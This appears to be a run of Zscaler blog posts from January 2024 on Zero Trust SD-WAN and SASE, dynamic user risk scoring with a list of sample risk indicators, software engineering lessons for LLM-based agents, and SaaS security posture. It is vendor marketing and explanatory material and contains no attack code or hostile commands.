minimizing cyber risk, reducing cost and complexity, improving business agility, and providing single-vendor SASE. For more information, visit the Zscaler Zero Trust SD-WAN webpage. Mon, 22 Jan 2024 17:50:01 -0800 Karan Dagar

Introducing Zero Trust SASE
The transformation of work and IT
The world of work is evolving rapidly, and hybrid work is now the new normal. Legacy network architectures were designed for a static working model in which users sat at fixed locations. Today's branches look very different, with desk hoteling, co-working spaces, mobile employees, and internet-centric connectivity. As branches evolve, the network infrastructure connecting them must adapt as well.

Legacy networks bring risk and complexity
The traditional connectivity model is highly network-centric: users, devices, and servers connect to a network, and that network provides access to every other device on the same network. This model involves far too much implicit trust. By default, any device can communicate with any other device or server, which facilitates lateral threat movement and attacks such as ransomware. Moreover, network-centric connectivity requires extending the network to public clouds and external users over VPN tunnels, which can expand the attack surface onto infrastructure you do not directly control. As IoT devices proliferate in the enterprise, managing the attack surface grows ever more complex. Routing overlays and traditional routing protocols add further complexity to these networks.
Traditional SD-WAN is not zero trust
SD-WANs likewise take a network-centric approach, using routing overlays with site-to-site VPN tunnels and routing protocols. While this lets organizations retire expensive MPLS networks and solve many operational challenges, SD-WANs also introduce security risk because they permit lateral movement. Keeping that risk in check requires network-based segmentation, which often means additional firewall appliances in branches and complex network-based security policies. Zero trust is a cybersecurity strategy that assumes no entity should be trusted by default and grants access to specific resources only on the basis of identity, context, and posture. This fundamentally contradicts how traditional networks operate. Trust in traditional networks can be constrained through techniques such as segmentation and access control, but these approaches can add considerable complexity. The time is ripe for a new approach based on zero trust principles.

Introducing Zero Trust SD-WAN
I previously announced our Branch Connector appliances for connecting branches through the Zero Trust Exchange. Today I am pleased to introduce Zero Trust SD-WAN, the industry's first zero trust solution for securely connecting branches, factories, hospitals, retail locations, and data centers, eliminating the security risks of traditional SD-WANs. Using lightweight virtual machines or plug-and-play appliances combined with the Zscaler Zero Trust Exchange, Zero Trust SD-WAN provides secure inbound and outbound zero trust networking for sites, with no overlay routing, extra firewall appliances, or policy inconsistencies.
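The zero trust decision model described above can be sketched in a few lines: rather than granting reachability because two endpoints share a network, every request is evaluated against identity, context, and device posture. The identities, applications, and policy entries below are hypothetical, purely for illustration; they are not Zscaler configuration.

```python
from dataclasses import dataclass

@dataclass
class Request:
    identity: str     # authenticated user or workload identity
    resource: str     # application being requested
    posture_ok: bool  # result of a device posture check (managed, patched, etc.)
    context: str      # e.g., location or network of origin

# Hypothetical allowlist: which identities may reach which applications,
# and from which contexts. In a zero trust model, this entitlement
# replaces network reachability as the basis for access.
POLICY = {
    ("alice@example.com", "crm-app"): {"trusted-office", "home"},
    ("branch-printer-01", "print-service"): {"branch-lan"},
}

def authorize(req: Request) -> bool:
    """Grant access only on identity + context + posture; never on
    network location alone (no implicit trust)."""
    allowed_contexts = POLICY.get((req.identity, req.resource))
    if allowed_contexts is None:  # identity is not entitled to this app
        return False
    if not req.posture_ok:        # failed device posture check
        return False
    return req.context in allowed_contexts
```

Note that an identity with no matching policy entry simply cannot reach the application at all, which mirrors the "no publicly reachable ports" property described above.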
Zero Trust SD-WAN is fully integrated into our industry-leading SSE platform, enabling robust security and simplifying branch network management. We are also announcing general availability of our Z-Connector plug-and-play appliances: the ZT 400, ZT 600, and ZT 800. Together with a lightweight virtual machine form factor, these appliances support a wide range of customer requirements, from 200 Mbps to multi-gigabit. With predefined configuration templates and zero-touch provisioning, bringing up a new branch can be as simple as establishing an internet connection.

New gateway capabilities
The Zero Trust SD-WAN solution can be deployed in two modes: forwarder or gateway. In forwarder mode, customers with existing WAN solutions can implement a zero trust overlay by deploying Z-Connector appliances alongside their existing routers and switches. Relevant traffic can be steered to the Z-Connector appliances through conditional DNS resolution or policy-based routing. Gateway mode terminates the ISP connection directly on the Z-Connector appliance, eliminating the need for additional routers or firewalls. The Z-Connector acts as the site's default gateway and forwards all traffic to the Zscaler Zero Trust Exchange, which provides secure connectivity to the internet, SaaS, and private applications. Gateway mode supports extensive WAN and LAN management capabilities, including dual ISP termination, application-aware path selection with ISP monitoring, high availability (active-active, active-passive), multiple LAN subnets, a local firewall, an integrated DHCP server, and a DNS gateway. Zero Trust SD-WAN gateway capabilities will be available starting in February 2024.
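The application-aware path selection with ISP monitoring mentioned above can be illustrated with a minimal sketch: each uplink is continuously probed for latency and loss, and each application class is steered to the best uplink that still meets its requirements. The link names, metrics, and SLA thresholds below are hypothetical, not actual product configuration.

```python
# Illustrative sketch of application-aware path selection across two ISPs.
# In practice, link metrics would come from continuous monitoring probes.
LINKS = {
    "isp-1": {"latency_ms": 18, "loss_pct": 0.1},
    "isp-2": {"latency_ms": 45, "loss_pct": 2.0},
}

# Per-application-class requirements (hypothetical thresholds).
APP_PROFILES = {
    "voice": {"max_latency_ms": 30, "max_loss_pct": 1.0},
    "bulk":  {"max_latency_ms": 200, "max_loss_pct": 5.0},
}

def select_path(app: str, links=LINKS) -> str:
    """Pick the lowest-latency uplink that satisfies the app's SLA;
    fall back to the overall lowest-latency link if none qualifies."""
    profile = APP_PROFILES[app]
    eligible = [
        name for name, m in links.items()
        if m["latency_ms"] <= profile["max_latency_ms"]
        and m["loss_pct"] <= profile["max_loss_pct"]
    ]
    candidates = eligible or list(links)
    return min(candidates, key=lambda n: links[n]["latency_ms"])
```

If the preferred uplink degrades below an application's thresholds, the next probe cycle simply steers that application class to the other ISP, which is the essence of dual-ISP, application-aware forwarding.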
Zero Trust SD-WAN reduces complexity and risk
Zero Trust SD-WAN addresses many of our customers' core challenges. Here are some key use cases:
- Site-to-site VPN replacement: Avoid complex VPN configurations and routing table management, and stop the lateral spread of threats.
- Faster integrations for mergers and acquisitions: Connect users to applications across different companies without merging routing domains or deploying NAT gateways. Cut integration time from months to days.
- Secure OT connectivity: Eliminate VPNs and exposed ports for vendor remote access to OT assets.
- IoT discovery and classification: Discover and protect IoT devices on the network with AI-powered classification engines.
For more on these use cases, see our blog on bringing zero trust to branch offices.

The industry's first SASE platform built on zero trust
Secure Access Service Edge (SASE) is a term coined by Gartner to describe the convergence of networking and security to suit modern IT infrastructure and ways of working. Although SASE incorporates zero trust principles, many SASE offerings on the market simply pair traditional SD-WAN with an SSE service, applying zero trust principles only to user-to-application access. This leaves sites exposed through excessive implicit trust. Zscaler's Zero Trust SD-WAN is the industry's first single-vendor SASE platform built on zero trust and AI. With Zero Trust SASE, organizations can extend zero trust beyond users to branches, factories, and data centers.
Built on the power of our SSE platform, the Zero Trust Exchange, Zero Trust SASE reduces cost and complexity by eliminating the need for traditional security and networking point products.

Transform your branch networks
Legacy WAN architectures have run their course. The industry-wide shifts around hybrid work and zero trust security present a unique opportunity to rethink and redesign your network architecture. Zero Trust SD-WAN and SASE take an entirely new approach to connecting users, devices, and applications without the risk of lateral threat movement. Visit our SASE page for more product details, whitepapers, and videos. Learn more about Zero Trust SD-WAN's capabilities here. Mon, 22 Jan 2024 17:50:01 -0800 Naresh Kumar How Zscaler’s Dynamic User Risk Scoring Works Access control policies aim to balance security and end user productivity, yet often fall short due to their static nature and limited ability to adapt to evolving threats. But what if there were an easy way to automate access control per user, considering individual risk factors and staying up-to-date with the latest advanced attacks? Zscaler User Risk Scoring takes dynamic access control and risk visibility to the next level using records of previous behavior to determine future risk. Similar to how insurance companies use driving records to determine car insurance rates, or banks use credit scores to assess loan eligibility, user risk scoring leverages previous behavior records to assign risk scores to individual users. This allows organizations to set dynamic access control policies based on various risk factors, accounting for the latest threat intelligence. User risk scoring empowers organizations to restrict access to sensitive applications for users with a high risk score until their risk profile improves.
By considering factors such as past victimization by cyberattacks, near-misses with malicious content, or engagement in behavior that could lead to a breach, organizations can ensure that access control policies are tailored to individual risk profiles. Organizations can set user risk thresholds to allow or deny access to both private and public applications. How does user risk scoring work? User risk scoring plays a crucial role across the Zscaler platform, driving policies for URL filtering, firewall rules, data loss prevention (DLP), browser isolation, and Zscaler Private Access (ZPA), and feeding into overall risk visibility in Zscaler Risk360. By leveraging user risk scores within each of these security controls, organizations can better protect all incoming and outgoing traffic from potential threats. URL filtering rules are one way that risk scoring can be applied to policies within Zscaler Internet Access (ZIA). The risk scoring process consists of two components: the static (baseline) risk score and the real-time risk score. The static risk score is established based on a one-week lookback at risky behavior and is updated every 24 hours. The real-time risk score modifies this baseline every 2 minutes throughout the day, updating whenever a user interacts with known or suspected malicious content. Each day at midnight, the real-time risk score is reset. Zscaler considers more than 65 indicators that influence the overall risk score. These indicators fall into three major categories: pre-infection behavior, post-infection behavior, and more general suspicious behavior. The model accounts for the fact that not all incidents are equal; each indicator has a variable contribution to the risk score based on the severity and frequency of the associated threat.
Pre-infection behavior indicators encompass a range of blocked actions that would have led to user infection, such as blocked malware, known and suspected malicious URLs, phishing sites, pages with browser exploits, and more. Post-infection behavior indicators include things like detected botnet traffic or command-and-control traffic, which show that a user/device has already been compromised. Suspicious behavior indicators are similar to pre-infection indicators but are less severe (and less certain to lead to infection), covering policy violations and risky activities like browsing deny-listed URLs, DLP compliance violations, anonymizing sites, and more. *A more detailed sampling of these indicators is included at the bottom of this article. How can Zscaler customers use risk scoring? User risk scores can be found in the analytics and policy administration menus of both Zscaler Internet Access (ZIA) and Zscaler Private Access (ZPA). They are also woven together with a range of additional inputs in Zscaler Risk360, which allows security teams to delve deeper into their organization’s holistic risk. Organizations can monitor risk scores for individuals and for the overall organization. Zscaler also has deep integrations with many leading security operations tools, allowing the same telemetry and incident alert context that feeds into risk scoring to be shared with tools like SIEM, SOAR, and XDR via a REST API to streamline workflows. These scores can be used to: Drive access control policies User risk scoring gives network and security teams a powerful tool to drive low-maintenance zero trust access control policies, controlling both incoming and outgoing internet and application traffic. It can be combined with other dynamic rulesets (e.g., device posture profiles) and static rulesets (e.g., URL and DNS filtering and app control policy) to protect organizations from breaches without unnecessarily restricting user productivity.
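As a rough illustration of how a threshold-based access policy could consume such a score, here is a hedged Python sketch. The indicator categories, weights, thresholds, and blending rule are hypothetical simplifications; Zscaler's actual model weighs 65+ indicators by severity and frequency.

```python
# Illustrative sketch of threshold-based access control driven by a dynamic
# user risk score. All weights and thresholds below are made up for the example.

# Hypothetical severity weights per indicator category
WEIGHTS = {
    "pre_infection": 10,   # e.g., blocked malware or phishing sites
    "post_infection": 25,  # e.g., botnet or C2 traffic (already compromised)
    "suspicious": 4,       # e.g., deny-listed URLs, DLP violations
}

def risk_score(baseline: int, incidents: list[tuple[str, int]]) -> int:
    """Blend the static baseline with real-time incidents, capped at 100.
    In the real system the baseline is refreshed every 24 hours and the
    real-time component is updated every 2 minutes and reset at midnight."""
    realtime = sum(WEIGHTS[category] * count for category, count in incidents)
    return min(100, baseline + realtime)

def allow_access(score: int, app_sensitivity: str) -> bool:
    """Deny access once the score crosses the app's (hypothetical) threshold."""
    thresholds = {"low": 90, "medium": 70, "high": 40}
    return score < thresholds[app_sensitivity]

# A user with a moderate baseline who just triggered a post-infection alert
score = risk_score(baseline=20, incidents=[("post_infection", 1)])
print(score)                          # 45
print(allow_access(score, "high"))    # False: blocked from sensitive apps
print(allow_access(score, "low"))     # True: general browsing still allowed
```

The point of the sketch is the shape of the policy: the score rises with risky behavior and automatically relaxes access again once the user's risk profile improves.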
User risk, device posture, and other access policies work together seamlessly to optimize secure access. Monitor overall organizational risk and key factors that can be improved: Admins can monitor their company risk over time to assess the top areas of overall company risk and prioritize remediation efforts. They can see how risk scores are distributed across users and locations, and can benchmark their risk score against other companies in their industry. Company risk scores can be analyzed over time against industry benchmarks. Monitor risky users on an individual basis and understand how (and why) their risk is trending: If a user’s risk score spikes, admins can take action, whether that means isolating the user’s machine to deal with an active threat or simply training a user whose behaviors pose an unacceptable risk. Admins can analyze individual users and double-click into specific incidents. Overall, Zscaler User Risk Scoring, with its categorization of threats and aggregation of logs, offers valuable insights into an organization's security posture. By understanding the different types of risks and behaviors associated with cyberthreats, organizations can implement dynamic access control policies and proactively protect their critical assets and data. With risk scoring, organizations can navigate the ever-changing threat landscape with confidence. To learn about more of Zscaler’s unique inline security capabilities, check out our Cyberthreat Protection page.
Sample Indicators for User Risk Scoring

Pre-infection behavior includes a range of blocked actions that would have likely led a user to be infected, such as:
- Malware blocked by Zscaler’s Advanced Threat Protection or inline Sandbox
- Blocked known and suspected malicious URLs
- Blocked websites with known and suspected phishing content
- Blocked pages with known browser exploits
- Blocked known and suspected adware and spyware
- Blocked pages with a high PageRisk score
- Quarantined pages
- Blocked files with known vulnerabilities
- Blocked emails containing viruses
- Detected mobile app vulnerabilities

Post-infection behavior includes a range of blocked actions that were attempted after a user was infected, such as:
- Botnet traffic
- Command-and-control traffic

Suspicious behavior includes policy violations and other risky sites, files, and conditions that could lead to infection, such as:
- Deny-listed URLs
- DLP compliance violations
- Pages with known dangerous ActiveX controls
- Pages vulnerable to cross-site scripting attacks
- Possible browser cookie theft
- Internet Relay Chat (IRC) tunneling use
- Anonymizing sites
- Blocks or warnings from secure browsing about an outdated/disallowed component
- Peer-to-peer (P2P) site denials
- Webspam sites
- Attempts to browse blocked URL categories
- Mobile app issues, including denial of the mobile app, insecure user credentials, location information leaks, personally identifiable information (PII), information identifying the device, or communication with unknown servers
- Tunnel blocks
- Fake proxy authentication
- SMTP (email) issues, including rejected password-encrypted attachments, unscannable attachments, detected or suspected spam, rejected recipients, DLP blocks or quarantines, or blocked attachments
- IPS blocks of cryptomining & blockchain traffic
- Reputation-based blocks of suspected adware/spyware sites
- Disallowed use of a DNS-over-HTTPS site

Fri, 19 Jan 2024 05:00:01 -0800 Mark Brozek It’s Time
for Zero Trust SASE The workplace has changed for good. According to a recent Gallup poll, 50% of US employees are working in hybrid mode and only 20% are entirely on-site. Another forecast analysis from Gartner projected hybrid work being the norm for almost 40% of global knowledge workers by the end of 2023. Branch offices no longer look the same, and more and more organizations are moving to a cafe-like model for their workplaces. Combined with the shift to cloud and SaaS, this is driving fundamental shifts in IT infrastructure. The way we design, build, and secure our networks needs to evolve to support this new normal. One size does not fit all The old network-centric model of connectivity and security presents challenges when users and apps are everywhere. Trying to shoehorn traditional firewall/VPN-based security into an increasingly fuzzy and complex network environment has only resulted in more cost, complexity, and risk. Cyberattacks keep rising despite the increasing spend on firewalls, fueling threats such as ransomware. According to Zscaler ThreatLabz, ransomware attacks increased almost 40% between 2022 and 2023, with the average demand being $5.3M. The current generation of networking technologies was designed to solve problems from 30 years ago, when IT systems couldn’t talk to each other. It’s no surprise that we ended up with a networking stack designed to maximize connectivity and reachability between users and computing systems globally. While this has unlocked vast amounts of productivity gains and business value, it has come at the expense of cyber risk. An attacker needs to find just one entry point anywhere in the organization and can move laterally from there to access critical crown jewel applications and data. With an attack surface spanning branches, retail locations, clouds, remote users, and partners, securing traditional network infrastructure has become a complex and costly endeavor. 
Zero trust is disrupting networking Zero trust is a cybersecurity strategy that shifts the focus from networks to entities—users, devices, apps, and services. It asserts that no entity should be trusted by default and should only be explicitly allowed to access certain resources based on identity, context, and security posture, and then continuously reassessed for every new connection. Traditional networking does not lend itself to the zero trust model since it confers implicit trust—once you’re on the network, you can go anywhere and talk to any entity. Network architects can limit the amount of trust and the extent of lateral movement by segmenting the network, but this is complex and difficult to manage—it’s like building a superhighway system and adding checkpoints at every ramp and interchange. Zero trust networking is an opportunity to fundamentally rethink the way we build enterprise networks. Instead of starting with fully trusted routed overlays, we need to start with a zero trust foundation and then connect entities into an exchange that can broker connections as needed based on context and security posture. Figure: Zero Trust Architecture Traditional SD-WAN is not zero trust Traditional SD-WAN arrived on the scene over a decade ago and was meant to give organizations an alternative to expensive MPLS WAN services. Using multiple ISP connections and active path monitoring, SD-WANs drastically improved the overall reliability and performance of internet connections and offered organizations the confidence that mission-critical apps can work over the internet. Fast-forward a decade and through a global pandemic, and we no longer need to prove that the internet is fast and reliable enough to run enterprise apps. Gigabit fiber connections are readily available and most SaaS apps are optimized to be consumed over the internet. 
SD-WAN needs to solve different problems today—like ensuring a consistent experience and security for users between home and office, securing IoT device traffic and extending zero trust security to all sites, without the use of additional firewall/VPN appliances. Secure Access Service Edge (SASE) Gartner coined the term SASE in 2019 to describe the convergence of security and networking, delivered from a common cloud native platform that is better aligned with modern traffic flows. SASE is widely understood to be a combination of security services such as FWaaS, SWG, CASB, DLP, and connectivity services such as ZTNA and SD-WAN, delivered from the cloud. The shift to SASE represents an opportunity to rethink and rebuild security services from the ground up for cloud scale. Yet many SASE solutions simply extend the firewall/VPN model to the cloud and deliver a hosted version of the traditional security appliances. With bolted-on SD-WAN integrations, these solutions fail to deliver the promise of zero trust for anything beyond users. A better way Zscaler pioneered zero trust security for remote users and eliminated clunky remote-access VPNs, reducing cyber risk for thousands of organizations globally. We built an industry-leading AI-powered SSE platform that has been a leader in the Gartner Magic Quadrant for SSE two years in a row. Now, we’re excited to bring the same zero trust security to branches, factories, retail stores, and data centers. Join us on January 23 as we announce our industry-first SD-WAN innovations that help you transform your security and networking architecture with a Zero Trust SASE platform built on zero trust AI. Hear from your industry peers about their transformation journeys and the benefits they realized. Register now and save your spot! Tue, 16 Jan 2024 16:39:35 -0800 Ameet Naik The Mythical LLM-Month It’s clear: 2023 was the year of AI. Beginning with the release of ChatGPT, it was a technological revolution. 
What began as conversational agents quickly moved to indexing documents (RAG), and now to indexing documents, connecting to data sources, and enabling data analysis with a simple sentence. With the success of ChatGPT, a lot of people promised last year to deliver large language models (LLMs) soon … and very few of those promises have been fulfilled. Some of the important reasons for that are:
- We are building AI agents, not LLMs
- People are treating the problem as a research problem, not an engineering problem
- Bad data
In this blog, we’ll examine the role of AI agents as a way to link LLMs with backend systems. Then, we'll look at how the use of intuitive, interactive semantics to comprehend user intent is setting up AI agents as the next generation of user interface and user experience (UI/UX). Finally, with upcoming AI agents in software, we’ll talk about why we need to bring back some principles of software engineering that people seem to have forgotten in the past few months. I Want a Pizza in 20 Minutes LLMs offer a more intuitive, streamlined approach to UI/UX interactions compared to traditional point-and-click methods. To illustrate this, suppose you want to order a “gourmet margherita pizza delivered in 20 minutes” through a food delivery app. This seemingly straightforward request can trigger a series of complex interactions in the app, potentially spanning several minutes of interactions using normal UI/UX. For example, you would probably have to choose the "Pizza" category, search for a restaurant with appetizing pictures, check if they have margherita pizza, and then find out whether they can deliver quickly enough—as well as backtrack if any of your criteria aren’t met. This flowchart expresses the interaction with the app. We Need More than LLMs LLMs are AI models trained on vast amounts of textual data, enabling them to understand and generate remarkably accurate human-like language.
Models such as OpenAI's GPT-3 have demonstrated exceptional abilities in natural language processing, text completion, and even generating coherent and contextually relevant responses. Although more recent LLMs can do data analysis, summary, and representation, the ability to connect external data sources, algorithms, and specialized interfaces to an LLM gives it even more flexibility. This can enable it to perform tasks that involve analysis of domain-specific real-time data, as well as open the door to tasks not yet possible with today’s LLMs. This “pizza” example illustrates the complexity of natural language processing (NLP) techniques. Even this relatively simple request necessitates connecting with multiple backend systems, such as databases of restaurants, inventory management systems, delivery tracking systems, and more. Each of these connections contributes to the successful execution of the order. Furthermore, the connections required may vary depending on the request. The more flexibility you want the system to understand and recognize, the more connections to different backend systems will need to be made. This flexibility and adaptability in establishing connections is crucial to accommodate diverse customer requests and ensure a seamless experience. AI Agents LLMs serve as the foundation for AI agents. To respond to a diverse range of queries, an AI agent leverages an LLM in conjunction with several integral auxiliary components:
- The agent core uses the LLM and orchestrates the agent's overall functionality.
- The memory module enables the agent to make context-aware decisions.
- The planner formulates the agent’s course of action based on the tools at hand.
- Various tools and resources support specific domains, enabling the AI agent to effectively process data, reason, and generate appropriate responses. The set of tools includes data sources, algorithms, and visualizations (or UI interactions).
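Putting these components together, a minimal agent loop might look like the following sketch. All class and tool names are illustrative, and the hardcoded plan stands in for what would really be an LLM planner call.

```python
# Minimal sketch of the agent components described above: a core that
# orchestrates, a memory module, a planner, and a small tool registry.
# The rule-based plan() is a stand-in for an actual LLM planner call.

class Memory:
    """History of past interactions plus current context."""
    def __init__(self):
        self.history = []   # records of previous inputs/outputs
        self.context = {}   # e.g., user location, preferences

    def remember(self, entry):
        self.history.append(entry)

class Agent:
    def __init__(self, tools):
        self.tools = tools  # tool name -> callable
        self.memory = Memory()

    def plan(self, question):
        """Stand-in for an LLM planner that emits (tool, sub-question) pairs.
        A real planner would prompt the LLM with a template like the one above."""
        return [
            ("search", "pizza places that deliver margherita"),
            ("math", "filter by delivery time <= 20 minutes"),
        ]

    def run(self, question):
        """Agent core: execute the plan, recording each step in memory."""
        results = []
        for tool_name, sub_question in self.plan(question):
            answer = self.tools[tool_name](sub_question)
            self.memory.remember((sub_question, answer))
            results.append(answer)
        return results

# Toy tools standing in for real backend connections
tools = {
    "search": lambda q: f"search results for: {q}",
    "math": lambda q: f"computed: {q}",
}
agent = Agent(tools)
print(agent.run("How to order a margherita pizza in 20 min in my app?"))
```

The design point is the separation of concerns: the planner decides what to do, the tools do it, and the memory lets later steps build on earlier ones.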
Agent core
The agent core is the “brain” of the AI agent, managing decision-making, communication, and coordination of modules and subsystems to help the agent operate seamlessly and interact efficiently with its environment or tasks. The agent core receives inputs, processes them, and generates actions or responses. It also maintains a representation of the agent's knowledge, beliefs, and intentions to guide its reasoning and behavior. Finally, the core oversees the update and retrieval of information from the agent's memory to help it make relevant, context-based decisions.

Memory
The memory module encompasses history memory and context memory components, which store and manage data the AI agent can use to simultaneously apply past experiences and current context to inform its decision-making. History memory stores records of previous inputs, outputs, and outcomes. These records let the agent learn from past interactions and gain insights into effective strategies and patterns that help it make better-informed decisions and avoid repeating mistakes. Context memory, meanwhile, enables the agent to interpret and respond appropriately to the specific, current circumstances using information about the environment, the user's preferences or intentions, and many other contextual factors.

Planner
The planner component analyzes the state of the agent’s environment, constraints, and factors such as goals, objectives, resources, rules, and dependencies to determine the most effective steps to achieve the desired outcome. Here’s an example of a prompt template the planner could use, according to Nvidia:

GENERAL INSTRUCTIONS
You are a domain expert. Your task is to break down a complex question into simpler sub-parts. If you cannot answer the question, request a helper or use a tool. Fill with Nil where no tool or helper is required.

AVAILABLE TOOLS
- Search Tool
- Math Tool

CONTEXTUAL INFORMATION
<information from Memory to help LLM to figure out the context around question>

USER QUESTION
“How to order a margherita pizza in 20 min in my app?”

ANSWER FORMAT
{"sub-questions":["<FILL>"]}

Using this, the planner could generate a plan to serve as a roadmap for the agent's actions, enabling it to navigate complex problems and strategically accomplish its goals.

Tools
Various other tools help the AI agent perform specific tasks or functions. For example:
- Retrieval-augmented generation (RAG) tools enable the agent to retrieve and use knowledge base content to generate coherent, contextually appropriate responses.
- Database connections allow the AI agent to query and retrieve relevant information from structured data sources to inform decisions or responses.
- Natural language processing (NLP) libraries offer text tokenization, named entity recognition, sentiment analysis, language modeling, and other functionality.
- Machine learning (ML) frameworks enable the agent to leverage ML techniques such as supervised, unsupervised, or reinforcement learning to enhance its capabilities.
- Visualization tools help the agent represent and interpret data or outputs visually, and can help the agent understand and analyze patterns, relationships, or trends in the data.
- Simulation environments provide a virtual environment where the agent can sharpen its skills, test strategies, and evaluate potential outcomes without affecting the real world.
- Monitoring and logging frameworks facilitate the tracking and recording of agent activities, performance metrics, or system events to help evaluate the agent's behavior, identify potential issues or anomalies, and support debugging and analysis.
- Data preprocessing tools use techniques like data cleaning, normalization, feature selection, and dimensionality reduction to ensure raw data is relevant and high-quality before the agent ingests it.
- Evaluation frameworks provide methodologies and metrics that enable the agent to measure its successes, compare approaches, and iterate on its capabilities.

These and other tools empower AI agents with functionality and resources to perform specific tasks, process data, make informed decisions, and enhance their overall capabilities.

Adding LLM-based Intelligent Agents to Your Data Is an Engineering Problem, Not a Research Problem
People realized that natural language makes it much easier, and far more forgiving, to specify the use cases required for software development. But because the English language can be ambiguous and imprecise, this is leading to a new problem in software development, where systems are not well specified or understood. Fred Brooks outlined many central software engineering principles in his 1975 book The Mythical Man-Month, some of which people seem to have forgotten during the LLM rush. For instance:

No silver bullet. This is the first principle people have forgotten with LLMs. They believe LLMs are the silver bullet that will eliminate the need for proper software engineering practices.

The second-system effect. LLM-based systems are being treated as a second system: people regard LLMs as so powerful that they forget LLMs' limitations.

The tendency toward an irreducible number of errors. Even if you get the LLM implementation correct, LLMs can hallucinate, or even surface errors that had stayed hidden because we previously had no way to exercise the backend so thoroughly.

Progress tracking. I remember the first thing I heard from Brooks’ book was, “How does a project get to be a year late? One day at a time.” I have seen people assume that if they sweep problems under the rug, the problems will disappear. Machine learning models, and LLMs in particular, inherit the same problems of ill-designed systems, with the added amplification of bad data, which we will describe later.

Conceptual integrity.
This principle has shifted from designing use cases (or user stories) so that they express the conceptual integrity of the entire system to assuming the LLM will magically bind any inconsistencies in the software. For example, take a user story for a food app order, “I want to order a gourmet margherita pizza in 20 min,” and change the question to:
- Can I get a gourmet margherita pizza delivered in 20 minutes?
- Show me all pizza places that can deliver a gourmet margherita pizza in 20 minutes.
- Show me all pizza places that can deliver a gourmet margherita pizza in 20 minutes ranked by user preference.
We can easily see that different types of data, algorithms, and visualizations are required to address this problem.

The manual and formal documents. Thanks to hype, this is probably the most forgotten principle in the age of LLMs. It’s not enough to say “develop a system that will tell me how to order things like a gourmet margherita pizza in 20 minutes.” This requires documentation of a whole array of other use cases, required backend systems, new types of visualizations to be created, and, crucially, specifications of what the system will not do. “Things like” seems to have become the norm in LLM software development, as if an LLM can magically connect to backend systems and visualize data it has never learned to understand.

The pilot system. Because of these limitations, software systems with LLM-based intelligent agents have not left the pilot stage at several companies, simply because they cannot reason beyond the simple questions used as example use cases.

In a recent paper, we addressed the first issue, the lack of proper specification of software systems, and showed a way to create formal specifications for LLM-based intelligent systems so that they can follow sound software engineering principles.

Bad Data
In a recent post on LinkedIn, we described the importance of “librarians” to LLM-based intelligent agents.
(Apparently, this post was misunderstood, as several teachers and actual librarians liked the post.) We were referring to the need for more formal data organization and writing methodologies to ensure LLM-based intelligent agents work. The cloud fulfilled its promise that we never have to delete data; we can simply keep storing it. With this came the pressure to create user documentation quickly. The result is a “data dump,” where old data lives alongside new data, where old specifications that were never implemented are still alive, and where outdated descriptions of system functionality persist, never having been updated in the documentation. Finally, documents seem to have forgotten what a “topic sentence” is. LLM-based systems expect documentation to contain well-written text, as recently shown when OpenAI stated that it is “impossible” to train AI without using copyrighted works. This alludes not only to the fact that we need a tremendous amount of text to train these models, but also that good quality text is required. This becomes even more important if you use RAG-based technologies. In RAG, we index document chunks (for example, using embedding technologies in vector databases), and whenever a user asks a question, we return the top-ranking documents to a generator LLM that in turn composes the answer. Needless to say, RAG technology requires well-written indexed text to generate the answers. Figure: RAG pipeline.

Conclusions
We have shown that there is an explosion of LLM-based promises in the field, and very few are coming to fruition. To build intelligent AI systems, we need to recognize that we are building complex software engineering systems, not prototypes. LLM-based intelligent systems bring another level of complexity to system design.
We need to consider to what extent we need to specify and test such systems properly, and we need to treat data as a first-class citizen, as these intelligent systems are much more susceptible to bad data than other systems. Tue, 16 Jan 2024 19:14:07 -0800 Claudionor Coelho Jr. Unleashing the Power of Zscaler's Unparalleled SaaS Security Zscaler has made great strides in securing organizations across the board, solving real customer use cases such as protecting against ransomware, securing AI, and securing data everywhere. One area that has received a lot of attention is SaaS security. Recently, Forrester released its latest Wave report for SaaS Security Posture Management, naming Zscaler the only Leader in this category. The report puts a heavy emphasis on use cases that span beyond posture management, such as app governance, shadow IT, identity access controls, advanced data protection, and more. Zscaler achieved the strongest position, earning a perfect score in 7 of the 12 categories. You can get your copy of the Forrester Wave here. As organizations increasingly adopt numerous SaaS-based services, there is a growing need for a comprehensive, fully integrated data security solution that covers all channels, including web, business and personal applications, public cloud data, endpoints, and email. Platforms provide multiple benefits, such as centralized policy creation, that reduce the complexity and costs inherent in point vendor solutions. Solving Today’s Key SaaS Security Challenges Many organizations use multiple point solutions, which can create issues and headaches for IT and security teams. Here are some of the top use cases driving SaaS security: Identity Management and Access Control To prevent leaks, data manipulation, and insider threats, users must be authenticated and authorized in line with zero trust principles for least-privileged access, including role-based access control and continuous monitoring.
Effective anti-phishing measures are also critical. Identity and access issues most often stem from:
- Weak or compromised identity and access management (IAM)
- A lack of multifactor authentication (MFA) beyond single sign-on (SSO)
- Inadequate or misconfigured access controls
Lack of Standardization Inconsistent security policies and procedures across SaaS providers can create challenges for security teams around consistent controls and enforcement, leading to a weaker posture, potential enforcement gaps, vulnerabilities, and even data corruption. Some of the major contributors to increased risk in this area include:
- Interoperability and integration issues between cloud providers
- Data transfers between environments
- Regulatory compliance challenges
Data Residency and Governance Complying with industry and government data protection regulations can be complex when SaaS providers run widely distributed operations. It’s critical to understand how a given SaaS provider aligns with your organization’s compliance requirements, as well as to implement effective data encryption and access controls for data in transit and at rest. Common residency and governance issues arise from:
- Sovereignty and residency regulations (e.g., GDPR)
- Shared responsibilities between the customer and SaaS provider
- Unsanctioned apps (shadow IT) putting data outside the IT function’s purview
To mitigate these risks, organizations should conduct thorough risk assessments, implement robust security policies and controls, regularly monitor SaaS applications for vulnerabilities, and stay up to date with security best practices. Furthermore, integrated solutions provide greater efficacy and context. Securing SaaS Platforms Requires Context The Power of Context In the realm of security, it’s essential to understand that it’s a matter of layers. These layers often converge, such as in the case of SSPM and data security. However, to truly grasp the significance of these layers, you need context. 
